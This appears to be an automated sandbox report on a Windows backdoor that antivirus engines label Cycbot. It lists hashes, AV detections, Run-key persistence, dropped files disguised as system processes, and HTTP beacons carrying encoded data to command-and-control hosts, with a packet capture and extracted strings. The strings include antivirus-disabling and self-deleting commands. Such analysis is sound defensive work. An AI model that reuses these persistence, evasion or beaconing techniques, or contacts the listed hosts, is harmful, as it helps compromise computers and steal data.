Analysis Date | 2015-01-14 10:37:50 |
---|---|
MD5 | 2502cb43dad8a5b5c68ea77dde4a94b2 |
SHA1 | 09e322ae487f2c52806ee445f8391fadd230db5e |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: d81a4fda2de17463282ff02fae0e166d sha1: c604dd646fbbc862be8e35a60e89cc2d9774a2ac size: 190464 | |
Section | .rdata md5: 19d3f1566018ecd91426b748915a33bc sha1: 986b352c813030842142e20f7e96e7a0eb1523d4 size: 50176 | |
Section | .data md5: bdd691a050d08bd374bad830fadcbbef sha1: 0ae87bcb6dde2c9ef854228c820fb03bc94247c3 size: 5120 | |
Section | .rsrc md5: af1f3614fbdf332641d41a60d8868f6a sha1: 843ccafbc15dd01f30e02cc0fdbe10184967d1a6 size: 1536 | |
Timestamp | 2011-02-28 14:45:25 | |
Version | PrivateBuild: 1065 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | fc426b2549d2044ef23aa94fa923a4eedd831e2f | |
IMPhash | 419430452cde85f54e7d37d9e39cedff | |
AV | 360 Safe | no_virus |
AV | Ad-Aware | Gen:Trojan.Heur.KS.1 |
AV | Alwil (avast) | Malware-gen:Win32:Malware-gen |
AV | Arcabit (arcavir) | Gen:Trojan.Heur.KS.1 |
AV | Authentium | W32/FraudLoad.C.gen!Eldorado |
AV | Avira (antivir) | BDS/Cycbot.B.1226 |
AV | BullGuard | Gen:Trojan.Heur.KS.1 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Backdoor.Cycbot |
AV | ClamAV | Win.Trojan.Cycbot-5273 |
AV | Dr. Web | BackDoor.Gbot.25 |
AV | Emsisoft | Gen:Trojan.Heur.KS.1 |
AV | Eset (nod32) | Win32/Cycbot.AK |
AV | Fortinet | W32/Cycbot.AF!tr |
AV | Frisk (f-prot) | W32/FraudLoad.C.gen!Eldorado |
AV | F-Secure | Gen:Trojan.Heur.KS.1 |
AV | Grisoft (avg) | BackDoor.Generic13.AOQC |
AV | Ikarus | Backdoor.Win32.Cycbot |
AV | K7 | no_virus |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | no_virus |
AV | Mcafee | BackDoor-EXI |
AV | Microsoft Security Essentials | Backdoor:Win32/Cycbot.B |
AV | MicroWorld (escan) | Gen:Trojan.Heur.KS.1 |
AV | Rising | no_virus |
AV | Sophos | no_virus |
AV | Symantec | Backdoor.Trojan |
AV | Trend Micro | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1 |
---|---|
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | C:\Documents and Settings\Administrator\Application Data\75DE.FFC |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data |
Creates Mutex | {A5B35993-9674-43cd-8AC7-5BC5013E617B} |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | {61B98B86-5F44-42b3-BCA1-33904B067B81} |
Creates Mutex | {7791C364-DE4E-4000-9E92-9CCAFDDD90DC} |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | {B37C48AF-B05C-4520-8B38-2FE181D5DC78} |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Winsock DNS | pdasoftstorage.com |
Winsock DNS | ordersmallcd.com |
Winsock DNS | 127.0.0.1 |
Winsock DNS | japanesegreenteaonline.com |
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process | C:\Documents and Settings\Administrator\Application Data\dwm.exe |
---|
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
---|
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Network Details:
DNS | japanesegreenteaonline.com Type: A 66.117.0.221 |
---|---|
DNS | zonetf.com Type: A 141.8.225.80 |
DNS | zonetf.com Type: A 141.8.225.80 |
DNS | ordersmallcd.com Type: A |
DNS | pdasoftstorage.com Type: A |
HTTP GET | http://japanesegreenteaonline.com/assets/images/greentea-cha-2.gif?v44=5&tq=gKZEtzyNv5%2FwCG7JJ89dGh9OdXplL73OUM5k9Qyw8zosty6MG30%2FNGhyIXgV2E6j8mzci7fV%2FM3zyMs0TC7vqrCceZSWwhFgo0SmQMeGhKVP7d6JZl71DYJWFlmvhYAPB%2B9LvJXLI2qIusLT%2BocaCXdnnDFpxyS3tLdSn7xqeXdk1DIbrSFlNvoXr7XLI3kgVlaDhqVtK3Xt3oZoJsfeOnPu4UDdOvdTiSbmDerbzcAqcklC%2B%2BRNsI814YynsimX6bIE2ea9DP%2FkL%2FUy0QE7PaX0SNLyIXm0HIKkj0KahY8iuBQ%2FRqgvflHxu83FLXGzwgJOwmk61%2Fgssy%2Bx%2FUMyEw120sdoequbctsLH9QmnMTKtZJRlVwLmFJKMnmknYF011ciOA1kfG8FZ%2FXmq21Ctqq2ez6AQpzHiBBbv User-Agent: mozilla/2.0 |
HTTP POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
HTTP POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
Flows TCP | 192.168.1.1:1031 ➝ 66.117.0.221:80 |
Flows TCP | 192.168.1.1:1033 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f617373 6574732f 696d6167 GET /assets/imag 0x00000010 (00016) 65732f67 7265656e 7465612d 6368612d es/greentea-cha- 0x00000020 (00032) 322e6769 663f7634 343d3526 74713d67 2.gif?v44=5&tq=g 0x00000030 (00048) 4b5a4574 7a794e76 35253246 77434737 KZEtzyNv5%2FwCG7 0x00000040 (00064) 4a4a3839 64476839 4f645870 6c4c3733 JJ89dGh9OdXplL73 0x00000050 (00080) 4f554d35 6b395179 77387a6f 73747936 OUM5k9Qyw8zosty6 0x00000060 (00096) 4d473330 2532464e 47687949 58675632 MG30%2FNGhyIXgV2 0x00000070 (00112) 45366a38 6d7a6369 37665625 32464d33 E6j8mzci7fV%2FM3 0x00000080 (00128) 7a794d73 30544337 76717243 63655a53 zyMs0TC7vqrCceZS 0x00000090 (00144) 57776846 676f3053 6d514d65 47684b56 WwhFgo0SmQMeGhKV 0x000000a0 (00160) 50376436 4a5a6c37 3144594a 57466c6d P7d6JZl71DYJWFlm 0x000000b0 (00176) 76685941 50422532 42394c76 4a584c49 vhYAPB%2B9LvJXLI 0x000000c0 (00192) 32714975 734c5425 32426f63 61435864 2qIusLT%2BocaCXd 0x000000d0 (00208) 6e6e4446 70787953 33744c64 536e3778 nnDFpxyS3tLdSn7x 0x000000e0 (00224) 71655864 6b314449 62725346 6c4e766f qeXdk1DIbrSFlNvo 0x000000f0 (00240) 58723758 4c49336b 67566c61 44687156 Xr7XLI3kgVlaDhqV 0x00000100 (00256) 744b3358 74336f5a 6f4a7366 654f6e50 tK3Xt3oZoJsfeOnP 0x00000110 (00272) 75345544 644f7664 54695362 6d446572 u4UDdOvdTiSbmDer 0x00000120 (00288) 627a6341 71636b6c 43253242 25324252 bzcAqcklC%2B%2BR 0x00000130 (00304) 4e734938 31345979 6e73696d 58366249 NsI814YynsimX6bI 0x00000140 (00320) 45326561 39445025 32466b4c 25324655 E2ea9DP%2FkL%2FU 0x00000150 (00336) 79305145 37506158 30534e4c 7949586d y0QE7PaX0SNLyIXm 0x00000160 (00352) 3048494b 6b6a304b 61685938 69754251 0HIKkj0KahY8iuBQ 0x00000170 (00368) 25324652 71677666 6c487875 3833464c %2FRqgvflHxu83FL 0x00000180 (00384) 58477a77 674a4f77 6d6b3631 25324667 XGzwgJOwmk61%2Fg 0x00000190 (00400) 73737925 32427825 3246554d 79457731 ssy%2Bx%2FUMyEw1 0x000001a0 (00416) 32307364 6f657175 62637473 4c483951 20sdoequbctsLH9Q 0x000001b0 (00432) 6d6e4d54 4b745a4a 526c5677 4c6d464a mnMTKtZJRlVwLmFJ 0x000001c0 (00448) 4b4d6e6d 6b6e5946 30313163 694f4131 KMnmknYF011ciOA1 0x000001d0 (00464) 6b664738 465a2532 46586d71 32314374 kfG8FZ%2FXmq21Ct 0x000001e0 (00480) 71713265 7a364151 707a4869 42426276 qq2ez6AQpzHiBBbv 0x000001f0 (00496) 20485454 502f312e 300d0a43 6f6e6e65 HTTP/1.0..Conne 0x00000200 (00512) 6374696f 6e3a2063 6c6f7365 0d0a486f ction: close..Ho 0x00000210 (00528) 73743a20 6a617061 6e657365 67726565 st: japanesegree 0x00000220 (00544) 6e746561 6f6e6c69 6e652e63 6f6d0d0a nteaonline.com.. 0x00000230 (00560) 41636365 70743a20 2a2f2a0d 0a557365 Accept: */*..Use 0x00000240 (00576) 722d4167 656e743a 206d6f7a 696c6c61 r-Agent: mozilla 0x00000250 (00592) 2f322e30 0d0a0d0a /2.0.... 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 4e745825 32425039 68253242 49307344 NtX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683838 79253242 636f4a74 OhLgjh88y%2BcoJt 0x000000c0 (00192) 58253242 534e7846 4b763937 35586c6d X%2BSNxFKv975Xlm 0x000000d0 (00208) 35472048 5454502f 312e310d 0a486f73 5G HTTP/1.1..Hos 0x000000e0 (00224) 743a207a 6f6e6574 662e636f 6d0d0a55 t: zonetf.com..U 0x000000f0 (00240) 7365722d 4167656e 743a204d 6f7a696c ser-Agent: Mozil 0x00000100 (00256) 6c612f34 2e302028 636f6d70 61746962 la/4.0 (compatib 0x00000110 (00272) 6c653b20 4d534945 20362e30 3b205769 le; MSIE 6.0; Wi 0x00000120 (00288) 6e646f77 73204e54 20352e31 290d0a43 ndows NT 5.1)..C 0x00000130 (00304) 6f6e7465 6e742d4c 656e6774 683a2030 ontent-Length: 0 0x00000140 (00320) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000150 (00336) 6f73650d 0a0d0a58 30534e4c 7949586d ose....X0SNLyIXm 0x00000160 (00352) 3048494b 6b6a304b 61685938 69754251 0HIKkj0KahY8iuBQ 0x00000170 (00368) 25324652 71677666 6c487875 3833464c %2FRqgvflHxu83FL 0x00000180 (00384) 58477a77 674a4f77 6d6b3631 25324667 XGzwgJOwmk61%2Fg 0x00000190 (00400) 73737925 32427825 3246554d 79457731 ssy%2Bx%2FUMyEw1 0x000001a0 (00416) 32307364 6f657175 62637473 4c483951 20sdoequbctsLH9Q 0x000001b0 (00432) 6d6e4d54 4b745a4a 526c5677 4c6d464a mnMTKtZJRlVwLmFJ 0x000001c0 (00448) 4b4d6e6d 6b6e5946 30313163 694f4131 KMnmknYF011ciOA1 0x000001d0 (00464) 6b664738 465a2532 46586d71 32314374 kfG8FZ%2FXmq21Ct 0x000001e0 (00480) 71713265 7a364151 707a4869 42426276 qq2ez6AQpzHiBBbv 0x000001f0 (00496) 20485454 502f312e 300d0a43 6f6e6e65 HTTP/1.0..Conne 0x00000200 (00512) 6374696f 6e3a2063 6c6f7365 0d0a486f ction: close..Ho 0x00000210 (00528) 73743a20 6a617061 6e657365 67726565 st: japanesegree 0x00000220 (00544) 6e746561 6f6e6c69 6e652e63 6f6d0d0a nteaonline.com.. 0x00000230 (00560) 41636365 70743a20 2a2f2a0d 0a557365 Accept: */*..Use 0x00000240 (00576) 722d4167 656e743a 206d6f7a 696c6c61 r-Agent: mozilla 0x00000250 (00592) 2f322e30 0d0a0d0a /2.0.... 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 4e745825 32425039 68253242 49307344 NtX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a682532 464d6525 3242636f OhLgjh%2FMe%2Bco 0x000000c0 (00192) 4a755825 3242534e 78564b76 39373558 JuX%2BSNxVKv975X 0x000000d0 (00208) 6c6d3547 20485454 502f312e 310d0a48 lm5G HTTP/1.1..H 0x000000e0 (00224) 6f73743a 207a6f6e 6574662e 636f6d0d ost: zonetf.com. 0x000000f0 (00240) 0a557365 722d4167 656e743a 204d6f7a .User-Agent: Moz 0x00000100 (00256) 696c6c61 2f342e30 2028636f 6d706174 illa/4.0 (compat 0x00000110 (00272) 69626c65 3b204d53 49452036 2e303b20 ible; MSIE 6.0; 0x00000120 (00288) 57696e64 6f777320 4e542035 2e31290d Windows NT 5.1). 0x00000130 (00304) 0a436f6e 74656e74 2d4c656e 6774683a .Content-Length: 0x00000140 (00320) 20300d0a 436f6e6e 65637469 6f6e3a20 0..Connection: 0x00000150 (00336) 636c6f73 650d0a0d 0a72202f 3e0a2020 close....r />. 0x00000160 (00352) 3c616464 72657373 3e4d6963 726f736f <address>Microso 0x00000170 (00368) 66742d49 49532f37 2e303c2f 61646472 ft-IIS/7.0</addr 0x00000180 (00384) 6573733e 0a20203c 2f626f64 793e0a3c ess>. </body>.< 0x00000190 (00400) 2f68746d 6c3e0a /html>.
Strings
U \ U / % .. 0 % - - CC . 00-+ \ . -e- . 00-+ 0 `@ -E- -0 -0010+-0 -0 0 0- 0 0 . u 040904b0 1065 !1Aa 1Name #+3;CScs 7root\CIMV2 9Select * from Win32_Product - abort() has been called April - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August Avast Avira BitDefender CCONOUT$ CHH:mm:ss (Cjj class CMicrosoft Visual C++ Runtime Library - CRT not initialized dddd, MMMM dd, yyyy December deflate descr domain DOMAIN error Dr.Web ESET NOD32 etext February - floating point support not loaded Friday gzip H ((((( H h(((( H http:// http=127.0.0.1:%d http://www.google.com http://www.yahoo.com January jjjjj July June Kaspersky March McAfee MM/dd/yy Monday mscoree.dll nKERNEL32.DLL Norton - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November (null) October ppchits ppcid ppctimeout PrivateBuild Program: <program name unknown> - pure virtual function call R6002 R6008 R6009 R6010 R6016 R6017 R6018 R6019 R6024 R6025 R6026 R6027 R6028 R6030 R6031 R6032 R6033 refmethod runtime error Runtime Error! Saturday September SING error stitle StringFileInfo Sunday This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. Thursday TLOSS error Translation Tuesday - unable to initialize heap - unable to open console device - unexpected heap error - unexpected multithread lock error VarFileInfo VS_VERSION_INFO Wednesday WUSER32.DLL 0123456789ABCDEF !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X \$09\$Lt "127.0.0.1" 127.0.0.1 127.0.0.1:%s 1#QNAN 1#SNAN .2mdn. {35BCA615-C82A-4152-8857-BCC626AE4C8D} <3%u1f {43B671F0-5D50-4dbe-AD9C-64A6167C57AD} {4D92BB9F-9A66-458f-ACA4-66172A7016D4} {61B98B86-5F44-42b3-BCA1-33904B067B81} {6B985724-623F-492e-B0D6-C9715ADE853B} {7791C364-DE4E-4000-9E92-9CCAFDDD90DC} ;7|G;p \$89\$ \$89\$ u 8Sh8_C |$,9|$ \$<9\$ 9|$0t: {95F6585C-CC1E-4b52-A63B-9FBC6A94F371} |$ 9|$8t 9\$Dulh 9p,u 9p4 |$$9|$ t \$$9\$<t ^9|$(t6 ^(9^$u 9}$uG9}@tB; {A5B35993-9674-43cd-8AC7-5BC5013E617B} abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/71 .abmr. Accept: */* Accept-Language .adtechus. AdTitle txt Advapi32.dll ADVAPI32.dll Alwil Software* amazon. </answer> aolcdn. aol/search aolsvc. app=application used to check images, APPDATA <applet </applet application application/java -arg0..-argn=application options <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="http://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>P .atdmt. attachment .atwola. August .autodatadirect. AUTO_UP Avast* AvastUI.exe .?AVbad_alloc@std@@ .?AVbad_exception@std@@ .?AVexception@std@@ avgnt.exe Avira* .?AVlength_error@std@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ .?AVtype_info@@ {B37C48AF-B05C-4520-8B38-2FE181D5DC78} bad allocation bad exception Base Class Array' Base Class Descriptor at ( __based( bing.com bing.com/search .bing.net BINPLACE : error BNP0000: Invalid switch - /%c BINPLACE looks for the following environment variable names: BINPLACE_OVERRIDE_FLAGS BINPLACE_OVERRIDE_FLAGS - may contain additional switches BINPLACE_PLACEFILE BINPLACE_PLACEFILE - default value for -p flag BINPLACE : warning BNP0000: ignoring directory %s bitdef blogger blog/images/3521.jpg blog/images/3522.jpg blog/images/3523.jpg </BODY> <BODY style="overflow: hidden;margin:0 0 0 0; padding:0 0 0 0;"> brightcove.com [-b subdir] put file in subdirectory of normal place buffer error {C0429A47-0CF0-4d1b-9616-C588FA0A3DDB} c1.exe c2.exe c3.exe {C66E79CE-8935-4ed9-A6B1-4983619CB925} C8;C0vE Cache-Control Cache-Control: no-cache, must-revalidate ccsvchst.exe __cdecl ChangeAsmsToRetailForSymbols check CHECK_CONTEINER chunked [-ci <rc,app,-arg0,-argv1,-argn>] .class Class Hierarchy Descriptor' CloseHandle __clrcall cmd.exe /c "%s" CoCreateInstance CoInitialize CoInitializeSecurity CompareStringW Complete Object Locator' /complete/search conhost conhost.exe Connection Connection: close Content-Disposition Content-Encoding Content-length: Content-Length Content-Length: 0 Content-Length: %u Content-Type `copy constructor closure' CopyFileA CorExitProcess CoSetProxyBlanket CoUninitialize CreateDirectoryA CreateEventA CreateFileA CreateFileMappingA CreateFileW CreateMutexA CreateProcessA CreateThread CreateTimerQueue CreateTimerQueueTimer CreateToolhelp32Snapshot csrss.exe D$$_^[3 D$4j P D$8PWWWWWWWWWW D$$9|$ D$$9D$ .dartsearch. @.data data error %d.%d.%d dddd, MMMM dd, yyyy [-d dump-override] December DecodePointer `default constructor closure' DefineDosDeviceA deflate del %%0 delete delete[] DeleteCriticalSection DeleteFileA DeleteTimerQueueEx del "%s" Description \Device\ DeviceIoControl D$HVWP DisableAntiSpyware D$L9|$ DMNAVL DNTCHECK .doubleclick. doubleclick. .doubleclick.net doubleclick.net D$|Ph~f D$pPWWWWWWW D$pSVW D$PSVW [%d] %s D$T;D$\ dwm.exe DWN_CON_STRP_%d_%s `dynamic atexit destructor for ' `dynamic initializer for ' d|YXkf://6KYOQXQAQjTcQh.ReOfhRTL2QIJGJfYDWV.Gfc/6a.HYct?y=Xsrdyt|QWiWQPd EDLGVK|BGlYFDd Vfc6SJK|ObfESQN q_b|RXeWRRO JAPT|EGScSDQ bEVo|6KYOQXb HQTIZd|QWiWQPd CUABM|EGScSDQ mMXV|IJLZ ObfESQNm|PQjW OTfZDDFQ|NMOE VVULTEei| d|YXkf://6RVROpXJQ.QNVdiRjWOgRGIAJQEUF.XdP/Dm.EjfT?o=hip0sd|aQTcZQ USgWbX|MDLGVE SPgQQFV|PSjESH bbi|_6iYNV SYhc|ZOhZOD D8Lb|MBnYQD bEVZAX|SGgeb6 RgIYQ|aRkWaP mJI6|KMIU MViLQR|HSjA QHZWjP|BYcD fMiZeO| d|YXkf://6XPGaYT6jiIZd.QdSfgPiJDK8NJJMcQWH.TSd/RS.FZVk?6=pZrtd2|MhZSa RPjJQ8|8_MBO ldPDdGW|RONHT jka|6hYAh SYhc|OfXRO O2Bf|ETJVc ODUMWi|6XPGa YfETU|AmUQd nWTT|cFHL 8_MBOm|TDWV EjZ6SZ|LWjS 6hYAhd|ZRgOa SRULFE|REQBh gRPRRUV|FFWGa scI|ZQPVZ WZiZ|XPfBQ D8Lb|KBjQQ ORH_VO|OHVOj QNYTE|dMeRe jWUV|EDLC REQBh|SKLdIjV 9F_Oac|RDYcEmQ gedOaRV|DKALMWF Xib|FKZRWiA LPXZ|ZWEcUSZ XQUp|QVXdFV6 JIHJFm|SKLdIjV 7WPJS|ZWEcUSZ hYWW|ROhV DKALMWF| d|YXkf://7JZZ-QePHYh-Sn_gV.Ub_/?kc=biZYq&XS=iusc|FZEcZO|HPGZe| d|YXkf://7JZZ-ZajEigA-medhW.Qba/?mN=dYehm&US=2pfc|bImZPWH|RSrXPg| d|YXkf://JF__eX_LUcIm_aV.Ub_/?kc=biZYq&XS=iush|HdPShCJ WKaeg|LUcIm QcbSeUT|fFQAQ _M_F ZcODhKW|fASPYbhT|AgUCnUaV gWZ_|VSH4RQPF EljJ| d|YXkf://ORVQ-bt.RKb/?lM=vrwq0&ge=wqdh|6JMGUSicLF TMYRNJ_ZS|a REWQRZeiV|hhWh iNRCC|YYJU mbRNZRY|gQN_ IWcPNUiTZ|Mcj_ f_caJQ8|8VXJ TgdNH| d|YXkf://PTW-aWXVNQ-hTicU.Tf_/?ja=rgjSg&aV=iaxp|YLRKiR|RNHMe| d|YXkf://Sac.GaXgPQhIVdQWXWZXRUH.4MU/EX.Bme_?m=rgtu_m|KGgebC|bUEn hdc|dSSh R XRE|KMIU HcgO|PVIk R CNYR|_aTP aQDs|YUVk O ZPUZ|G2RM _PN|YQWH R _fc|9F_K UefH|TQTZ M WZiZ|RPjF O2Bf|HBUZ Q ODUb|XZJI cOTa|UEcT BlUTV|YWe_i PQDGVI|HJla RQbMeV|BNUJ febCaUS|gQUj jWaVbF|G2RM WJOaaH|VZRYbAX VTZebA|gjSmUQd nb_|fkTVA8V KJSf|gXViMSd HFKd|eqgOYQN fMTZWf|eiiTL2L JVJEZ|gXViMSd SNMK|hgf6YcIVZ led|hYfRJQA8V KJSf|jNURMeZ6S SGRu|iGgQIhUQd cORXVT|XCPIMOJVc EUZHW|kGWHOaePJ lYFZ| d|YXkf://Sac.LWjT6cTCbUS.Tf_/?ja=rgjSg&aV=iaxx|DFeVe|R9NKGf|XgESh|AlYQd_|P-eXTI|EJGWRJ|DVaYLd OcVES|JG_a_ 6SiIpQ|T&X|V & U|RcbDH & 88JEOOV|TROTI Sd9 LHHOjb6|TYEmQa _WOag|UJHKCT _FBl|UQHhK_V SJHX|SjTNWYE dQQdj|RfekBU6B|O WUBl gDZ|X-WkRN|LHRZePJd|WUXOY|XlSfg mFDJ|FbKP CihV|NVRqe|INZY felPn|bOmOXZeb|cfRED|JGcIS JmaDQU|VfSAW_U QXj6aaI|l_STfPOfeDFG|PWGDP WQURTGf|jKRTd Ve_BYWEl|egkjfOfUJ|Y6P_EDF|Wja MVEei|7Ze YVkTO|RjY XXdjZSf|QkZ E2E_|RFX XdOOVGkZKS|I_l oWEgi|Ci_a mWOe|QkZ M2ASIU|NZc ZHRV|neIJU bSXf|GYTS qQQh|Thl PTDHKQWVJFm| d|YXkf://SJSR-fhTAe.SOg/?hb=rxunx&jS=kSam|WMFZe ZHbP|jbAJWOac dEaa|SfQUf VWfchEHJ|QTIFQ jgREbId|ZJXVSaeP|PgQNkfYb_mSf| __eabi @echo off [-e] don't exit if a file in list could not be binplaced `eh vector constructor iterator' `eh vector copy constructor iterator' `eh vector destructor iterator' `eh vector vbase constructor iterator' `eh vector vbase copy constructor iterator' encheck EncodePointer EnterCriticalSection err049 err050 err051 err053 err055 err060 err061 err062 err063 err064 err065 err067 err069 err072 err073 err077 err079 err080 err081 err082 err084 err085 err086 err087 err088 err093 err094 err095 err096 err097 err098 err099 err0%s_%d_%d err1001 err1002 err1003 err1005 err1006 err1007 err1008 err1009 err1010 err1011 err1012 err1013 err1014 err1015 err1016 err1017 err1018 err1019 err1020 err1021 err1022 err1023 err1024 err1025 err1026 err1027 err1028 err1029 err1030 err1031 err1032 err1033 err%d%s_%d_%d ewh/?y exec|%s ExitProcess ExpandEnvironmentStringsA Expires: -1 e|YXkf://Sac.Oa_X6c-WEhQgZUf.Qcc/?XP=Tdodj&Ul=xcf|YXkf://UTaX-ce_Hh-dNfUcV.Ub_/?kc=biZYq&XS=iusc|GhYYi|IJKY|ce_Hh|bEYUSRkWbb|USX8Q WRMJhU|RQbMeV 9WaM|RniChiOlQ|ThlU fheSH|ALLMBO aUQHhMUi|CJUKeeR 9gjG|aQcViWQ dZMO|4FMEQ HZcHUZGj|0JYP qOZhAgYAf|vcj_ zbblVOK8VX|kOnY pHfVWiOFUZ|xjhE 4jNaMa|0egW JZSDD|hVXJCcdWLT|pSlAW_G|IX_Ejb|tVYQXiO|z_RSLFCe|nOUVRXVV|2ieLJJOO|6R8jiAhQ|zTUhcfZM|xGTMKSB|MYODXVS|J6IHRWo|JEWdRV|aQn_Z|ObjJG6NZITTVcW|Dda_eHc_OQ|XR8jeRcX|QRUQhhROH|2AQTIFr|QFWeW|SU6QHZ|OhQAcoA|VXUijS|O_bFJJ8-L|EMUVSH|DdEXh6SPR|Ojh6RjSZ|MgTfkWP|RSL4CXX|BSnQQH|RWSTKQ|HZOZPJT|QTVcQn|ShUaVOWAL|IZBMcTH|DoKWiPNU|HOZhNYb|BcMmZe|PhgfBU|48NISHii|FDbEe|T6QHT 